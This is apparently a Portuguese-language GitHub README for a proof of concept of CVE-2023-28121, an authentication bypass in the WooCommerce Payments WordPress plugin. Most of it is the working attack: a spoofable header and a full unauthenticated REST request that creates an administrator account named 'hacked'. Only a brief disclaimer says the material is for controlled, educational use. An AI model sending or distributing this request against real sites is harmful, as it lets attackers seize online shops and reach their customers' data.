
Exploração prática de vulnerabilidade crítica no WordPress usando o plugin WooCommerce Payments.
Exploração prática de vulnerabilidade crítica no WordPress usando o plugin WooCommerce Payments.
A CVE-2023-28121 permite criar usuários administradores sem autenticação via REST API.
📊 O plugin afetado possui centenas de milhares de instalações, sendo amplamente usado em e-commerces.
https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44
O sistema aceita um header manipulável:
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
Com isso, é possível enviar uma requisição para criação de usuário com privilégios elevados sem autenticação válida.
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
{
"username": "hacked",
"password": "StrongPass123!",
"email": "[email protected]",
"roles": ["administrator"]
}
✔️ Resultado: criação de usuário admin
/wp-admin👨💻 Autor
Luis Eduardo .M.B.S.R
Pentester / Web Security
LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/
GitHub: https://github.com/luisdevpentest
Uso educacional em ambiente controlado. Não me responsabiliso de como é usado tal conhecimento por terceiros.